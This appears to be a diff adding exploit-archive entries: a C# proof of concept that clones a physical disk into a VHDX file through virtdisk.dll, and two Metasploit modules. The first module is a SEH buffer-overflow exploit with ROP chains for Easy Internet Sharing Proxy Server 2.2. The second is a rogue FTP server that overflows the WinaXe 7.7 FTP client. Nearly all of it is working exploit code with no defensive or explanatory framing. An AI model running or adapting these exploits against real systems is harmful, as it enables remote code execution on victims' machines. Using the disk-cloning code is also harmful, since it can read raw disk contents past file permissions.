+using System.Management;
+using System.Runtime.InteropServices;
+using System.Linq;
+
+namespace Poc
+{
+    class Program
+    {
+        enum StorageDeviceType
+        {
+            Unknown = 0,
+            Iso = 1,
+            Vhd = 2,
+            Vhdx = 3,
+            VhdSet = 4,
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct VirtualStorageType
+        {
+            public StorageDeviceType DeviceId;
+            public Guid VendorId;
+        }
+
+        enum OpenVirtualDiskFlag
+        {
+            None = 0,
+            NoParents = 1,
+            BlankFile = 2,
+            BootDrive = 4,
+            CachedIo = 8,
+            DiffChain = 0x10,
+            ParentcachedIo = 0x20,
+            VhdSetFileOnly = 0x40,
+        }
+
+        enum CreateVirtualDiskVersion
+        {
+            Unspecified = 0,
+            Version1 = 1,
+            Version2 = 2,
+            Version3 = 3,
+        }
+            
+        [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+        struct CreateVirtualDiskParameters
+        {            
+            public CreateVirtualDiskVersion Version;
+            public Guid UniqueId;
+            public ulong MaximumSize;
+            public uint BlockSizeInBytes;
+            public uint SectorSizeInBytes;            
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string ParentPath;
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string SourcePath;            
+        }
+
+        enum VirtualDiskAccessMask
+        {
+            None = 0,
+            AttachRo = 0x00010000,
+            AttachRw = 0x00020000,
+            Detach = 0x00040000,
+            GetInfo = 0x00080000,
+            Create = 0x00100000,
+            MetaOps = 0x00200000,
+            Read = 0x000d0000,
+            All = 0x003f0000
+        }
+
+        enum CreateVirtualDiskFlag
+        {
+            None = 0x0,
+            FullPhysicalAllocation = 0x1,
+            PreventWritesToSourceDisk = 0x2,
+            DoNotcopyMetadataFromParent = 0x4,
+            CreateBackingStorage = 0x8,
+            UseChangeTrackingSourceLimit = 0x10,
+            PreserveParentChangeTrackingState = 0x20,
+        }        
+
+        [DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
+        static extern int CreateVirtualDisk(
+            [In] ref VirtualStorageType VirtualStorageType,
+            string Path,
+            VirtualDiskAccessMask        VirtualDiskAccessMask,
+            [In] byte[] SecurityDescriptor,
+            CreateVirtualDiskFlag        Flags,
+            uint ProviderSpecificFlags,
+            [In] ref CreateVirtualDiskParameters Parameters,
+            IntPtr  Overlapped,
+            out IntPtr Handle
+        );
+
+        static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
+        static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
+
+        class PhysicalDisk
+        {
+            public uint Index { get; private set; }
+            public string Name { get; private set; }
+            public uint SectorSizeInBytes { get; private set; }
+            public ulong SizeInBytes { get; private set; }            
+            public string Model { get; private set; }
+
+            public PhysicalDisk(ManagementObject wmi_object)
+            {
+                Index = (uint)wmi_object["Index"];
+                Name = (string)wmi_object["DeviceId"];
+                SectorSizeInBytes = (uint)wmi_object["BytesPerSector"];
+                SizeInBytes = (ulong)wmi_object["Size"];                
+                Model = (string)wmi_object["Model"];
+            }
+
+            static string FormatHuman(ulong l)
+            {
+                if (l < 1000 * 1000)
+                    return l.ToString();
+
+                l = l / (1000 * 1000);
+                if (l < 1000)
+                    return String.Format("{0}MB", l);
+
+                l = l / (1000);
+                if (l < 1000)
+                    return String.Format("{0}GB", l);
+
+                l = l / (1000);
+                if (l < 1000)
+                    return String.Format("{0}TB", l);
+
+                return l.ToString();
+            }
+
+            public override string ToString()
+            {
+                return String.Format("{0}: Name={1}, Model={2}, Size={3}", Index, Name, Model, FormatHuman(SizeInBytes));
+            }
+
+            public static IEnumerable<PhysicalDisk> GetDisks()
+            {
+                SelectQuery selectQuery = new SelectQuery("Win32_DiskDrive");
+                ManagementObjectSearcher searcher =
+                    new ManagementObjectSearcher(selectQuery);
+                foreach (ManagementObject disk in searcher.Get())
+                {
+                    yield return new PhysicalDisk(disk);
+                }
+            }
+        }
+
+        static PhysicalDisk GetPhysicalDisk(uint index)
+        {
+            PhysicalDisk disk = PhysicalDisk.GetDisks().First(d => d.Index == index);
+
+            if (disk == null)
+                throw new InvalidOperationException(String.Format("Can't find physical disk index {0}", index));
+
+            return disk;
+        }
+
+        static void PrintPhysicalDisks()
+        {
+            foreach (PhysicalDisk disk in PhysicalDisk.GetDisks())
+            {
+                Console.WriteLine(disk);
+            }            
+        }
+
+        static SafeFileHandle CreateVHD(string path, PhysicalDisk disk)
+        {
+            VirtualStorageType vhd_type = new VirtualStorageType();
+            vhd_type.DeviceId = StorageDeviceType.Vhdx;
+            vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
+
+            CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
+            ps.Version = CreateVirtualDiskVersion.Version1;
+            ps.SectorSizeInBytes = disk.SectorSizeInBytes;
+            ps.MaximumSize = disk.SizeInBytes + (100 * 1024 * 1024);
+            ps.SourcePath = disk.Name;
+            IntPtr hDisk;
+            int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
+            if (error != 0)
+            {
+                throw new Win32Exception(error);
+            }
+
+            return new SafeFileHandle(hDisk, true);
+        }        
+        
+        static void Main(string[] args)
+        {
+            try
+            {                
+                if (args.Length < 2)
+                {
+                    Console.WriteLine(@"[USAGE]: poc output.vhdx driveno");
+                    Console.WriteLine("Where driveno is one of the following indexes");
+                    PrintPhysicalDisks();
+                    Environment.Exit(1);
+                }
+                
+                string vhd_path = Path.GetFullPath(args[0]);
+                vhd_path = Path.ChangeExtension(vhd_path, ".vhdx");
+                File.Delete(vhd_path);
+                PhysicalDisk disk = GetPhysicalDisk(uint.Parse(args[1]));
+                                
+                Console.WriteLine("[INFO]: Creating VHD {0} from {1}", vhd_path, disk.Name);
+                
+                using (SafeFileHandle handle = CreateVHD(vhd_path, disk))
+                {
+                    Console.WriteLine("[SUCCESS]: Created clone of physical disk");
+                }                
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[ERROR]: {0}", ex.Message);
+            }
+        }
+    }
+}

platforms/windows/remote/40760.rb

@@ -0,0 +1,288 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy Internet Sharing Proxy Server 2.2 SEH buffer Overflow',
+      'Description'    => %q{
+        This module exploits a SEH buffer overflow in the Easy Internet Sharing Proxy Socks Server 2.2
+      },
+      'Platform'       => 'win',
+      'Author'         =>
+        [
+          'tracyturben[at]gmail.com'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ %w{URL http://www.sharing-file.com/products.htm}]
+        ],
+      'Privileged'     => false,
+
+      'Payload'        =>
+        {
+          'Space'           => 836,
+          'BadChars' => '\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c',
+          'StackAdjustment' => -3500,
+        },
+      'Targets'=>
+        [
+          [ 'Windows 10 32bit', { 'Ret' => 0x0043AD2C,'Offset' => 836,'Nops' => 44 } ],
+          [ 'Windows 8.1 32bit SP1', { 'Ret' => 0x0043AD30,'Offset' => 908 } ],
+          [ 'Windows 7 32bit SP1', { 'Ret' => 0x0043AD38,'Offset' => 884 } ],
+          [ 'Windows Vista 32bit SP2 ', { 'Ret' => 0x0043AD38,'Offset' => 864 } ]
+        ],
+      'DefaultOptions'=>{
+      'RPORT'=> 1080,
+      'EXITFUNC'=> 'thread'
+        },
+      'DisclosureDate' => 'Nov 10 2016',
+      'DefaultTarget'=> 0))
+end
+
+  def exploit
+    connect
+    rop_gadgets =''
+
+    if target.name =~ /Vista 32bit/
+
+     print_good("Building Windows Vista Rop Chain")
+     rop_gadgets =
+     [
+      0x0043fb03,
+      0x0043fb03,
+      0x0043fb03,
+      0x0043fb03,
+      0x0043fb03,
+      0x00454559,  # POP EAX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x00462589,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x004543b2,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046764d,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x004532e5,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # size
+      0x00486fac,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x0044fc45,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0045460d,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+   ].flatten.pack('V*')
+
+   print_good('Building Exploit...')
+   sploit = "\x90" *46
+   sploit << rop_gadgets
+   sploit << payload.encoded
+   sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+   sploit << generate_seh_record(target.ret)
+   print_good('Sending exploit...')
+   sock.put(sploit)
+
+   print_good('Exploit Sent...')
+
+   handler
+
+   disconnect
+end
+
+   if target.name =~ /7 32bit/
+
+
+    print_good('Building Windows 7 Rop Chain')
+
+    rop_gadgets =
+    [
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0047da72,  # POP EAX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x00450e40,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046934a,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # size
+      0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x00453ce6,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x00478ecd,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+    ].flatten.pack('V*')
+
+    print_good('Building Exploit...')
+    sploit = "\x90" *26
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << generate_seh_record(target.ret)
+    print_good('Sending exploit...')
+    sock.put(sploit)
+
+    print_good('Exploit Sent...')
+    sleep(5)
+    handler
+
+    disconnect
+
+end
+
+   if target.name =~ /8.1 32bit/
+
+    print_good('Building Windows 8 Rop Chain')
+
+    rop_gadgets =
+    [
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0047da72,  # POP EAX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x00450e40,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046934a,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # size
+      0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x00453ce6,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x00478ecd,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+
+    ].flatten.pack('V*')
+
+    print_good('Building Exploit...')
+    sploit = "\x90" *2
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << generate_seh_record(target.ret)
+    print_good('Sending exploit...')
+    sock.put(sploit)
+    print_good('Exploit Sent...')
+    handler
+
+    disconnect
+
+
+end
+
+    if target.name =~ /10 32bit/
+
+
+
+    print_good('Building Windows 10 Rop Chain')
+
+    rop_gadgets =
+    [
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0047f1de,  # POP EBX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x41414141,  # Filler (compensate)
+      0x00438d30,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x004676b0,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046bf38,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x00481477,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # Filler (compensate)
+      0x00488098,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x0044ca38,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x00454559,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+    ].flatten.pack('V*')
+
+    print_good('Building Exploit...')
+    sploit = "\x90" *2
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << make_nops(target['Nops'])
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << generate_seh_record(target.ret)
+    print_good('Sending exploit...')
+    sock.put(sploit)
+
+    print_good('Exploit Sent...')
+
+    handler
+
+
+    disconnect
+
+  end
+ end
+end
+

platforms/windows/remote/40767.rb

@@ -0,0 +1,71 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::FtpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WinaXe 7.7 FTP Client Remote Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in the WinaXe 7.7 FTP client.
+        This issue is triggered when a client connects to the server and is
+        expecting the Server Ready response.
+      },
+      'Author' =>
+        [
+          'Chris Higgins',  # msf Module -- @ch1gg1ns
+          'hyp3rlinx'        # Original discovery
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '40693'],
+          [ 'URL', 'http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => "\x00\x0a\x0d"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal',
+            {
+              'Offset' => 2065,
+              'Ret' => 0x68017296 # push esp # ret 0x04 WCMDPA10.dll
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Nov 03 2016',
+      'DefaultTarget'  => 0))
+  end
+
+  def on_client_unknown_command(c, _cmd, _arg)
+    c.put("200 OK\r\n")
+  end
+
+  def on_client_connect(c)
+      print_status("Client connected...")
+
+      sploit =  rand_text(target['Offset'])
+      sploit << [target.ret].pack('V')
+      sploit << make_nops(10)
+      sploit << payload.encoded
+      sploit << make_nops(20)
+
+      c.put("220" + sploit + "\r\n")
+      c.close
+  end
+
+end